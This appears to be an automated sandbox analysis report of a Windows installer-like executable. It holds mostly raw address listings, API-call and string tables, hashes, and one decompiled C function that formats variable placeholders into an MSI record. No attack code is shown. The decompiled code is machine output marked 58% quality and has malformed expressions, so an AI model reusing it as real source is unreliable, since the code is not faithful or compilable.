                                                                                                                                                                  0x0042383a
                                                                                                                                                                  0x0042383a
                                                                                                                                                                  0x0042384b
                                                                                                                                                                  0x0042384e
                                                                                                                                                                  0x00423855
                                                                                                                                                                  0x00423858
                                                                                                                                                                  0x00423859
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423859
                                                                                                                                                                  0x00423814
                                                                                                                                                                  0x00423817
                                                                                                                                                                  0x0042381a
                                                                                                                                                                  0x0042381f
                                                                                                                                                                  0x0042381f
                                                                                                                                                                  0x00423820
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423825
                                                                                                                                                                  0x004237c0
                                                                                                                                                                  0x004237c0
                                                                                                                                                                  0x004237c3
                                                                                                                                                                  0x004237ef
                                                                                                                                                                  0x004237ef
                                                                                                                                                                  0x004237c5
                                                                                                                                                                  0x004237c5
                                                                                                                                                                  0x004237ca
                                                                                                                                                                  0x004237cb
                                                                                                                                                                  0x004237d0
                                                                                                                                                                  0x004237d5
                                                                                                                                                                  0x004237d7
                                                                                                                                                                  0x004237e2
                                                                                                                                                                  0x004237e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004237e7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004237c3
                                                                                                                                                                  0x00423782
                                                                                                                                                                  0x00423782
                                                                                                                                                                  0x00423793
                                                                                                                                                                  0x00423796
                                                                                                                                                                  0x0042379d
                                                                                                                                                                  0x004237a0
                                                                                                                                                                  0x004237a1
                                                                                                                                                                  0x004237a6
                                                                                                                                                                  0x004237a6
                                                                                                                                                                  0x004237ab
                                                                                                                                                                  0x004237b0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004237b0
                                                                                                                                                                  0x0042373d
                                                                                                                                                                  0x0042373d
                                                                                                                                                                  0x0042374e
                                                                                                                                                                  0x00423751
                                                                                                                                                                  0x00423758
                                                                                                                                                                  0x0042375b
                                                                                                                                                                  0x0042375c
                                                                                                                                                                  0x00423761
                                                                                                                                                                  0x00423761
                                                                                                                                                                  0x00423766
                                                                                                                                                                  0x0042376b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042376b
                                                                                                                                                                  0x004236f7
                                                                                                                                                                  0x004236f7
                                                                                                                                                                  0x00423708
                                                                                                                                                                  0x0042370b
                                                                                                                                                                  0x00423712
                                                                                                                                                                  0x00423715
                                                                                                                                                                  0x00423716
                                                                                                                                                                  0x0042371b
                                                                                                                                                                  0x0042371b
                                                                                                                                                                  0x00423720
                                                                                                                                                                  0x00423725
                                                                                                                                                                  0x00423a80
                                                                                                                                                                  0x00423a80
                                                                                                                                                                  0x00423a81
                                                                                                                                                                  0x00423a86
                                                                                                                                                                  0x00423a88
                                                                                                                                                                  0x00423a8a
                                                                                                                                                                  0x00423a8a
                                                                                                                                                                  0x00423a8b
                                                                                                                                                                  0x00423a91
                                                                                                                                                                  0x00423a95
                                                                                                                                                                  0x00423a99

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,00000000,?,0042329E,?,?), ref: 004236EA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,0042329E,?,?), ref: 004236F7
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000000,00000000,?,0042329E,?,?), ref: 00423733
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0042329E,?,?), ref: 0042373D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$EventObjectSingleWait
                                                                                                                                                                  • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                  • API String ID: 3600396749-2104912459
                                                                                                                                                                  • Opcode ID: 4d08242e12c5d8d50a4c673d89665f10a1ad598223545e5ab1285a5331b2af7c
                                                                                                                                                                  • Instruction ID: e682a47c0b598dbaf2299a1f93c5bb84b4295f8417852d07f3833c5291fe90a2
                                                                                                                                                                  • Opcode Fuzzy Hash: 4d08242e12c5d8d50a4c673d89665f10a1ad598223545e5ab1285a5331b2af7c
                                                                                                                                                                  • Instruction Fuzzy Hash: DA91EF32B40631BBFB21AA75AD09B6675E4EF08751F114227FE05EA590E7ADDC0086EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402162, Relevance: 49.4, APIs: 9, Strings: 19, Instructions: 434stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E00402162(void* __edx, struct _CRITICAL_SECTION* _a4, signed short _a8, intOrPtr _a12, signed short _a16, intOrPtr _a20) {
				signed short _v8;
				char _v12;
				signed short _v16;
				signed int _v20;
				char _v24;
				signed short _v28;
				intOrPtr* _v32;
				char _v36;
				signed short _v40;
				signed short _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t115;
				signed short _t116;
				signed short _t118;
				signed short _t120;
				signed short _t121;
				signed short _t127;
				signed short _t128;
				signed short _t134;
				signed short _t140;
				signed short _t153;
				signed short _t159;
				signed short _t160;
				signed short _t168;
				WCHAR* _t180;
				signed short _t181;
				signed int _t182;
				signed short _t183;
				signed short _t184;
				signed int _t185;
				void* _t188;
				void* _t190;
				signed short _t194;
				signed short _t195;
				signed short _t201;
				signed short _t202;
				void* _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed short _t208;
				signed short _t209;
				signed short _t210;
				signed short _t213;
				signed short _t216;
				signed short _t219;
				signed short _t222;
				void* _t223;

				_t205 = __edx;
				_t207 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				_v36 = 0;
				_v28 = 0;
				EnterCriticalSection(_a4);
				_t180 = _a8;
				_t208 = E00433BDF( &_v24, lstrlenW(_t180) + 1);
				_a8 = _t208;
				if(_t208 >= 0) {
					_push(0x5b);
					_push(_t180);
					_t209 = E00426E94(_t113, _t180, _t188, _t205, 0, _t208, __eflags);
					_v40 = _t209;
					while(1) {
						_pop(_t190);
						__eflags = _t209;
						if(__eflags == 0) {
							break;
						}
						_t13 = _t209 + 2; // 0x2
						_t115 = _t13;
						_push(0x5d);
						_v32 = _t115;
						_t116 = E00426E94(_t115, _t180, _t190, _t205, _t207, _t209, __eflags);
						_t190 = _t115;
						_v44 = _t116;
						__eflags = _t116;
						if(_t116 == 0) {
							break;
						}
						_t201 = (_t116 - _t209 >> 1) - 1;
						__eflags = _t201;
						_v20 = _t201;
						if(_t201 != 0) {
							__eflags = _t209 - _t180;
							if(_t209 <= _t180) {
								L12:
								_t208 = E00433F88( &_v12, _v32, _t201);
								_a8 = _t208;
								__eflags = _t208;
								if(_t208 < 0) {
									_push("Failed to get variable name.");
									L7:
									_push(_t208);
									L8:
									E00430A57();
									L64:
									_t181 = _v8;
									goto L65;
								}
								_t185 = _v8;
								_t202 = _v16;
								_push(1);
								_push(4 + _t185 * 4);
								__eflags = _t202;
								if(_t202 == 0) {
									_t201 = E00431078();
									_v16 = _t201;
									__eflags = _t201;
									if(_t201 == 0) {
										_t184 = 0x8007000e;
										_t208 = 0x8007000e;
										_a8 = 0x8007000e;
										E004300D9(_t150, "variable.cpp", 0x3ea, 0x8007000e);
										_push("Failed to allocate variable array.");
										L36:
										_push(_t184);
										goto L8;
									}
									L17:
									__eflags = _v20 - 2;
									if(_v20 < 2) {
										L20:
										__eflags = _a20 - _t207;
										if(_a20 == _t207) {
											L22:
											_t153 = _v16 + _t185 * 4;
											__eflags = _v36 - _t207;
											if(_v36 == _t207) {
												_v40 = _t153;
												_t208 = E00403AC6(_t201, _t205, _a4, _v12, _t153);
												_a8 = _t208;
												__eflags = _t208 - 0x80070490;
												if(_t208 == 0x80070490) {
													_t160 = E00433F88(_v40, 0x43b580, _t207);
													_t208 = _t160;
													_a8 = _t160;
												}
												L27:
												__eflags = _t208;
												if(_t208 < 0) {
													_push("Failed to set variable value.");
													goto L7;
												}
												_v8 = _t185 + 1;
												_t208 = E00433CEA( &_v12, L"[%d]", _t185 + 1);
												_t223 = _t223 + 0xc;
												_a8 = _t208;
												__eflags = _t208;
												if(_t208 < 0) {
													_push("Failed to format placeholder string.");
													goto L7;
												}
												_t208 = E00433C35(_t201,  &_v24, _v12, _t207);
												_a8 = _t208;
												__eflags = _t208;
												if(_t208 < 0) {
													_push("Failed to append placeholder.");
													goto L7;
												}
												L30:
												_t180 = _v44 + 2;
												__eflags = _t180;
												_push(0x5b);
												_push(_t180);
												_t159 = E00426E94(_t158, _t180, _t201, _t205, _t207, _t208, _t180);
												_t209 = _t159;
												_v40 = _t159;
												continue;
											}
											_push(_t207);
											_push(L"*****");
											L24:
											_push(_t153);
											_t208 = E00433F88();
											_a8 = _t208;
											goto L27;
										}
										_t208 = E00403619(_t201, _a4, _v12,  &_v36);
										_a8 = _t208;
										__eflags = _t208;
										if(_t208 < 0) {
											E00430A57(_t208, "Failed to determine variable visibility: \'%ls\'.", _v12);
											goto L64;
										}
										goto L22;
									}
									_t205 = 0x5c;
									__eflags = _t205 -  *_v32;
									if(_t205 !=  *_v32) {
										goto L20;
									}
									_push(1);
									_push(_v40 + 4);
									_t153 = _t201 + _t185 * 4;
									goto L24;
								}
								_push(_t202);
								_t168 = E0043120C();
								__eflags = _t168;
								if(_t168 == 0) {
									_t184 = 0x8007000e;
									_t208 = 0x8007000e;
									_a8 = 0x8007000e;
									E004300D9(_t168, "variable.cpp", 0x3e4, 0x8007000e);
									_push("Failed to reallocate variable array.");
									goto L36;
								}
								_t201 = _t168;
								_v16 = _t201;
								goto L17;
							}
							_t208 = E00433C35(_t201,  &_v24, _t180, _t209 - _t180 >> 1);
							_a8 = _t208;
							__eflags = _t208;
							if(_t208 < 0) {
								L6:
								_push("Failed to append string.");
								goto L7;
							}
							_t201 = _v20;
							goto L12;
						}
						_t208 = E00433C35(_t201,  &_v24, _t180, (_t116 - _t180 >> 1) + 1);
						_a8 = _t208;
						__eflags = _t208;
						if(_t208 >= 0) {
							goto L30;
						}
						goto L6;
					}
					_t118 = E00433C35(_t190,  &_v24, _t180, _t207);
					_t208 = _t118;
					_a8 = _t208;
					__eflags = _t208;
					if(_t208 < 0) {
						goto L6;
					}
					_t181 = _v8;
					_push(_t181);
					L0042FF6A();
					_v28 = _t118;
					__eflags = _t118;
					if(_t118 != 0) {
						_push(_v24);
						_push(_t207);
						_push(_t118);
						L0042FF70();
						__eflags = _t118;
						if(_t118 == 0) {
							_t127 = _v8;
							_t182 = _t207;
							__eflags = _t127;
							if(_t127 == 0) {
								L51:
								_t183 = _v28;
								_t128 =  &_v20;
								_push(_t128);
								_push(0x43b580);
								_push(_t183);
								_push(_t207);
								_v20 = _t207;
								L0042FF76();
								__eflags = _t128 - 0xea;
								if(_t128 == 0xea) {
									L55:
									__eflags = _a12 - _t207;
									if(_a12 == _t207) {
										L62:
										_t194 = _a16;
										__eflags = _t194;
										if(_t194 != 0) {
											 *_t194 = _v20;
										}
										goto L64;
									}
									_v20 = _v20 + 1;
									_t208 = E00433BDF( &_v12, _v20 + 1);
									_a8 = _t208;
									__eflags = _t208;
									if(_t208 >= 0) {
										_t134 =  &_v20;
										_push(_t134);
										_push(_v12);
										_push(_t183);
										_push(_t207);
										L0042FF76();
										__eflags = _t134;
										if(_t134 == 0) {
											_t208 = E00433F88(_a12, _v12, _t207);
											_a8 = _t208;
											__eflags = _t208;
											if(_t208 >= 0) {
												goto L62;
											}
											_push("Failed to copy string.");
											goto L7;
										}
										__eflags = _t134;
										_t213 =  <=  ? _t134 : _t134 & 0x0000ffff | 0x80070000;
										__eflags = _t213;
										_t208 =  >=  ? 0x80004005 : _t213;
										_a8 = _t208;
										E004300D9(0x80004005, "variable.cpp", 0x43c, _t208);
										_push("Failed to format record.");
										goto L7;
									}
									_push("Failed to allocate string.");
									goto L7;
								}
								__eflags = _t128;
								if(_t128 == 0) {
									goto L55;
								}
								__eflags = _t128;
								_t216 =  <=  ? _t128 : _t128 & 0x0000ffff | 0x80070000;
								__eflags = _t216;
								_t208 =  >=  ? 0x80004005 : _t216;
								_a8 = _t208;
								E004300D9(0x80004005, "variable.cpp", 0x432, _t208);
								_push("Failed to get formatted length.");
								goto L7;
							}
							_t195 = _v16;
							do {
								_t206 =  *((intOrPtr*)(_t195 + _t182 * 4));
								__eflags =  *_t206 - _t207;
								if( *_t206 == _t207) {
									goto L50;
								}
								_push(_t206);
								_t74 = _t182 + 1; // 0x1
								_t140 = _t74;
								_push(_t140);
								_push(_v28);
								L0042FF70();
								__eflags = _t140;
								if(_t140 != 0) {
									__eflags = _t140;
									_t219 =  <=  ? _t140 : _t140 & 0x0000ffff | 0x80070000;
									__eflags = _t219;
									_t208 =  >=  ? 0x80004005 : _t219;
									_a8 = _t208;
									E004300D9(0x80004005, "variable.cpp", 0x426, _t208);
									_push("Failed to set record string.");
									goto L7;
								}
								_t127 = _v8;
								_t195 = _v16;
								L50:
								_t182 = _t182 + 1;
								__eflags = _t182 - _t127;
							} while (_t182 < _t127);
							goto L51;
						}
						__eflags = _t118;
						_t222 =  <=  ? _t118 : _t118 & 0x0000ffff | 0x80070000;
						__eflags = _t222;
						_t208 =  >=  ? 0x80004005 : _t222;
						_a8 = _t208;
						E004300D9(0x80004005, "variable.cpp", 0x41e, _t208);
						_push("Failed to set record format string.");
						_push(_t208);
						E00430A57();
						goto L65;
					}
					_t184 = 0x8007000e;
					_t208 = 0x8007000e;
					_a8 = 0x8007000e;
					E004300D9(_t118, "variable.cpp", 0x41a, 0x8007000e);
					_push("Failed to allocate record.");
					goto L36;
				} else {
					_push("Failed to allocate buffer for format string.");
					_push(_t208);
					E00430A57();
					_t181 = 0;
					L65:
					LeaveCriticalSection(_a4);
					_t120 = _v16;
					if(_t120 == 0) {
						L73:
						_t121 = _v28;
						if(_t121 != 0) {
							_push(_t121);
							L0042FF64();
						}
						if(_v24 != 0) {
							E004380AB(_v24);
						}
						if(_v12 != 0) {
							E004380AB(_v12);
						}
						return _t208;
					}
					if(_t181 == 0) {
						L72:
						E00431137(_t120);
						goto L73;
					}
					_t210 = _t120;
					do {
						if( *((intOrPtr*)(_t210 + _t207 * 4)) != 0) {
							E004380AB( *((intOrPtr*)(_t210 + _t207 * 4)));
						}
						_t207 = _t207 + 1;
					} while (_t207 < _t181);
					_t208 = _a8;
					_t120 = _v16;
					goto L72;
				}
			}




















































                                                                                                                                                                  0x00402162
                                                                                                                                                                  0x0040216e
                                                                                                                                                                  0x00402170
                                                                                                                                                                  0x00402173
                                                                                                                                                                  0x00402176
                                                                                                                                                                  0x00402179
                                                                                                                                                                  0x0040217c
                                                                                                                                                                  0x0040217f
                                                                                                                                                                  0x00402182
                                                                                                                                                                  0x00402185
                                                                                                                                                                  0x0040218b
                                                                                                                                                                  0x004021a0
                                                                                                                                                                  0x004021a2
                                                                                                                                                                  0x004021a7
                                                                                                                                                                  0x004021bd
                                                                                                                                                                  0x004021bf
                                                                                                                                                                  0x004021c5
                                                                                                                                                                  0x004021c7
                                                                                                                                                                  0x00402380
                                                                                                                                                                  0x00402381
                                                                                                                                                                  0x00402382
                                                                                                                                                                  0x00402384
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004021cf
                                                                                                                                                                  0x004021cf
                                                                                                                                                                  0x004021d2
                                                                                                                                                                  0x004021d5
                                                                                                                                                                  0x004021d8
                                                                                                                                                                  0x004021de
                                                                                                                                                                  0x004021df
                                                                                                                                                                  0x004021e2
                                                                                                                                                                  0x004021e4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004021f0
                                                                                                                                                                  0x004021f0
                                                                                                                                                                  0x004021f1
                                                                                                                                                                  0x004021f4
                                                                                                                                                                  0x00402225
                                                                                                                                                                  0x00402227
                                                                                                                                                                  0x00402246
                                                                                                                                                                  0x00402253
                                                                                                                                                                  0x00402255
                                                                                                                                                                  0x00402258
                                                                                                                                                                  0x0040225a
                                                                                                                                                                  0x00402451
                                                                                                                                                                  0x00402218
                                                                                                                                                                  0x00402218
                                                                                                                                                                  0x00402219
                                                                                                                                                                  0x00402219
                                                                                                                                                                  0x00402600
                                                                                                                                                                  0x00402600
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402600
                                                                                                                                                                  0x00402260
                                                                                                                                                                  0x00402263
                                                                                                                                                                  0x00402266
                                                                                                                                                                  0x0040226f
                                                                                                                                                                  0x00402270
                                                                                                                                                                  0x00402272
                                                                                                                                                                  0x0040228e
                                                                                                                                                                  0x00402290
                                                                                                                                                                  0x00402293
                                                                                                                                                                  0x00402295
                                                                                                                                                                  0x00402430
                                                                                                                                                                  0x0040243b
                                                                                                                                                                  0x00402442
                                                                                                                                                                  0x00402445
                                                                                                                                                                  0x0040244a
                                                                                                                                                                  0x004023f6
                                                                                                                                                                  0x004023f6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004023f6
                                                                                                                                                                  0x0040229b
                                                                                                                                                                  0x0040229b
                                                                                                                                                                  0x0040229f
                                                                                                                                                                  0x004022ba
                                                                                                                                                                  0x004022ba
                                                                                                                                                                  0x004022bd
                                                                                                                                                                  0x004022db
                                                                                                                                                                  0x004022de
                                                                                                                                                                  0x004022e1
                                                                                                                                                                  0x004022e4
                                                                                                                                                                  0x004022fd
                                                                                                                                                                  0x00402308
                                                                                                                                                                  0x0040230a
                                                                                                                                                                  0x0040230d
                                                                                                                                                                  0x00402313
                                                                                                                                                                  0x0040231e
                                                                                                                                                                  0x00402323
                                                                                                                                                                  0x00402325
                                                                                                                                                                  0x00402325
                                                                                                                                                                  0x00402328
                                                                                                                                                                  0x00402328
                                                                                                                                                                  0x0040232a
                                                                                                                                                                  0x00402426
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402426
                                                                                                                                                                  0x0040233b
                                                                                                                                                                  0x00402343
                                                                                                                                                                  0x00402345
                                                                                                                                                                  0x00402348
                                                                                                                                                                  0x0040234b
                                                                                                                                                                  0x0040234d
                                                                                                                                                                  0x0040241c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040241c
                                                                                                                                                                  0x00402360
                                                                                                                                                                  0x00402362
                                                                                                                                                                  0x00402365
                                                                                                                                                                  0x00402367
                                                                                                                                                                  0x00402412
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402412
                                                                                                                                                                  0x0040236d
                                                                                                                                                                  0x00402370
                                                                                                                                                                  0x00402370
                                                                                                                                                                  0x00402373
                                                                                                                                                                  0x00402375
                                                                                                                                                                  0x00402376
                                                                                                                                                                  0x0040237b
                                                                                                                                                                  0x0040237d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040237d
                                                                                                                                                                  0x004022e6
                                                                                                                                                                  0x004022e7
                                                                                                                                                                  0x004022ec
                                                                                                                                                                  0x004022ec
                                                                                                                                                                  0x004022f2
                                                                                                                                                                  0x004022f4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022f4
                                                                                                                                                                  0x004022ce
                                                                                                                                                                  0x004022d0
                                                                                                                                                                  0x004022d3
                                                                                                                                                                  0x004022d5
                                                                                                                                                                  0x00402405
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040240a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022d5
                                                                                                                                                                  0x004022a6
                                                                                                                                                                  0x004022a7
                                                                                                                                                                  0x004022aa
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022b2
                                                                                                                                                                  0x004022b4
                                                                                                                                                                  0x004022b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004022b5
                                                                                                                                                                  0x00402274
                                                                                                                                                                  0x00402275
                                                                                                                                                                  0x0040227a
                                                                                                                                                                  0x0040227c
                                                                                                                                                                  0x004023d7
                                                                                                                                                                  0x004023e2
                                                                                                                                                                  0x004023e9
                                                                                                                                                                  0x004023ec
                                                                                                                                                                  0x004023f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004023f1
                                                                                                                                                                  0x00402282
                                                                                                                                                                  0x00402284
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402284
                                                                                                                                                                  0x0040223a
                                                                                                                                                                  0x0040223c
                                                                                                                                                                  0x0040223f
                                                                                                                                                                  0x00402241
                                                                                                                                                                  0x00402213
                                                                                                                                                                  0x00402213
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402213
                                                                                                                                                                  0x00402243
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402243
                                                                                                                                                                  0x00402206
                                                                                                                                                                  0x00402208
                                                                                                                                                                  0x0040220b
                                                                                                                                                                  0x0040220d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040220d
                                                                                                                                                                  0x00402390
                                                                                                                                                                  0x00402395
                                                                                                                                                                  0x00402397
                                                                                                                                                                  0x0040239a
                                                                                                                                                                  0x0040239c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004023a2
                                                                                                                                                                  0x004023a5
                                                                                                                                                                  0x004023a6
                                                                                                                                                                  0x004023ab
                                                                                                                                                                  0x004023ae
                                                                                                                                                                  0x004023b0
                                                                                                                                                                  0x0040245b
                                                                                                                                                                  0x0040245e
                                                                                                                                                                  0x0040245f
                                                                                                                                                                  0x00402460
                                                                                                                                                                  0x00402465
                                                                                                                                                                  0x00402467
                                                                                                                                                                  0x004024a6
                                                                                                                                                                  0x004024a9
                                                                                                                                                                  0x004024ab
                                                                                                                                                                  0x004024ad
                                                                                                                                                                  0x004024d6
                                                                                                                                                                  0x004024d6
                                                                                                                                                                  0x004024d9
                                                                                                                                                                  0x004024dc
                                                                                                                                                                  0x004024dd
                                                                                                                                                                  0x004024e2
                                                                                                                                                                  0x004024e3
                                                                                                                                                                  0x004024e4
                                                                                                                                                                  0x004024e7
                                                                                                                                                                  0x004024ec
                                                                                                                                                                  0x004024f1
                                                                                                                                                                  0x00402561
                                                                                                                                                                  0x00402561
                                                                                                                                                                  0x00402564
                                                                                                                                                                  0x004025f4
                                                                                                                                                                  0x004025f4
                                                                                                                                                                  0x004025f7
                                                                                                                                                                  0x004025f9
                                                                                                                                                                  0x004025fe
                                                                                                                                                                  0x004025fe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004025f9
                                                                                                                                                                  0x0040256f
                                                                                                                                                                  0x0040257b
                                                                                                                                                                  0x0040257d
                                                                                                                                                                  0x00402580
                                                                                                                                                                  0x00402582
                                                                                                                                                                  0x0040258e
                                                                                                                                                                  0x00402591
                                                                                                                                                                  0x00402592
                                                                                                                                                                  0x00402595
                                                                                                                                                                  0x00402596
                                                                                                                                                                  0x00402597
                                                                                                                                                                  0x0040259c
                                                                                                                                                                  0x0040259e
                                                                                                                                                                  0x004025e1
                                                                                                                                                                  0x004025e3
                                                                                                                                                                  0x004025e6
                                                                                                                                                                  0x004025e8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004025ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004025ea
                                                                                                                                                                  0x004025a9
                                                                                                                                                                  0x004025ab
                                                                                                                                                                  0x004025b3
                                                                                                                                                                  0x004025b5
                                                                                                                                                                  0x004025c3
                                                                                                                                                                  0x004025c6
                                                                                                                                                                  0x004025cb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004025cb
                                                                                                                                                                  0x00402584
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402584
                                                                                                                                                                  0x004024f3
                                                                                                                                                                  0x004024f5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402500
                                                                                                                                                                  0x00402502
                                                                                                                                                                  0x0040250a
                                                                                                                                                                  0x0040250c
                                                                                                                                                                  0x0040251a
                                                                                                                                                                  0x0040251d
                                                                                                                                                                  0x00402522
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402522
                                                                                                                                                                  0x004024af
                                                                                                                                                                  0x004024b2
                                                                                                                                                                  0x004024b2
                                                                                                                                                                  0x004024b5
                                                                                                                                                                  0x004024b8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004024ba
                                                                                                                                                                  0x004024bb
                                                                                                                                                                  0x004024bb
                                                                                                                                                                  0x004024be
                                                                                                                                                                  0x004024bf
                                                                                                                                                                  0x004024c2
                                                                                                                                                                  0x004024c7
                                                                                                                                                                  0x004024c9
                                                                                                                                                                  0x00402535
                                                                                                                                                                  0x00402537
                                                                                                                                                                  0x0040253f
                                                                                                                                                                  0x00402541
                                                                                                                                                                  0x0040254f
                                                                                                                                                                  0x00402552
                                                                                                                                                                  0x00402557
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402557
                                                                                                                                                                  0x004024cb
                                                                                                                                                                  0x004024ce
                                                                                                                                                                  0x004024d1
                                                                                                                                                                  0x004024d1
                                                                                                                                                                  0x004024d2
                                                                                                                                                                  0x004024d2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004024b2
                                                                                                                                                                  0x00402472
                                                                                                                                                                  0x00402474
                                                                                                                                                                  0x0040247c
                                                                                                                                                                  0x0040247e
                                                                                                                                                                  0x0040248c
                                                                                                                                                                  0x0040248f
                                                                                                                                                                  0x00402494
                                                                                                                                                                  0x00402499
                                                                                                                                                                  0x0040249a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004024a0
                                                                                                                                                                  0x004023b6
                                                                                                                                                                  0x004023c1
                                                                                                                                                                  0x004023c8
                                                                                                                                                                  0x004023cb
                                                                                                                                                                  0x004023d0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004021a9
                                                                                                                                                                  0x004021a9
                                                                                                                                                                  0x004021ae
                                                                                                                                                                  0x004021af
                                                                                                                                                                  0x004021b6
                                                                                                                                                                  0x00402603
                                                                                                                                                                  0x00402606
                                                                                                                                                                  0x0040260c
                                                                                                                                                                  0x00402611
                                                                                                                                                                  0x00402638
                                                                                                                                                                  0x00402638
                                                                                                                                                                  0x0040263d
                                                                                                                                                                  0x0040263f
                                                                                                                                                                  0x00402640
                                                                                                                                                                  0x00402640
                                                                                                                                                                  0x00402649
                                                                                                                                                                  0x0040264e
                                                                                                                                                                  0x0040264e
                                                                                                                                                                  0x00402657
                                                                                                                                                                  0x0040265c
                                                                                                                                                                  0x0040265c
                                                                                                                                                                  0x00402667
                                                                                                                                                                  0x00402667
                                                                                                                                                                  0x00402615
                                                                                                                                                                  0x00402632
                                                                                                                                                                  0x00402633
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402633
                                                                                                                                                                  0x00402617
                                                                                                                                                                  0x00402619
                                                                                                                                                                  0x0040261d
                                                                                                                                                                  0x00402622
                                                                                                                                                                  0x00402622
                                                                                                                                                                  0x00402627
                                                                                                                                                                  0x00402628
                                                                                                                                                                  0x0040262c
                                                                                                                                                                  0x0040262f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040262f

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000F8,00000000,000000F8,000000F8,000000F8,00000000,00000000,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00402185
                                                                                                                                                                  • lstrlenW.KERNEL32(000002A8,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 0040218F
                                                                                                                                                                  • #17.MSI(00000000,000000F8,000002A8,00000000,000000F8,00000001,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 004023A6
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000F8,000000F8,000002A8,00000000,000000F8,00000001,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00402606
                                                                                                                                                                  • #8.MSI(004068A8,?,004068A8,000000F8,000000F8,000002A8,000000F8), ref: 00402640
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
